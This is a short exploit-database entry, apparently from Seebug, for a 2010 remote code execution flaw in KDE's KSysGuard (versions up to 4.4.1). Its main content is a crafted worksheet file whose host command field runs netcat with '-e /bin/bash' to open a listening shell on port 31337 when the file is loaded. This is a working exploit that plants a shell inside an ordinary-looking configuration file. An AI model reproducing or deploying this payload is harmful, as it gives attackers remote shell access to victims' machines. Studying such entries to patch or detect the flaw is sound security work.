# Exploit Title: Ksysguard RCE via Cross Application Scripting # Date: 2010 03 20 # Author: Emanuele 'emgent' Gentili # Code: http://www.backtrack.it/~emgent/exploits/20100320_Ksysguard_RCE_CAS.txt # Version: <= 4.4.1 # CVE : N/A # Vendor: http://www.kde.org # Video: http://www.backtrack.it/~emgent/videos/16032010_-_SecuritySummit_CAS_OWNING_KDE.mov # About CAS: http://en.wikipedia.org/wiki/Cross_Application_Scripting # http://it.wikipedia.org/wiki/Cross_Application_Scripting halfapple:~ emanuelegentili$ cat ph33r.sgrd <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE KSysGuardWorkSheet> <WorkSheet title="She" interval="2" locked="0" rows="2" columns="2" > <host command="nc -l -p31337 -e /bin/bash" /> </WorkSheet> halfapple:~ emanuelegentili$
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论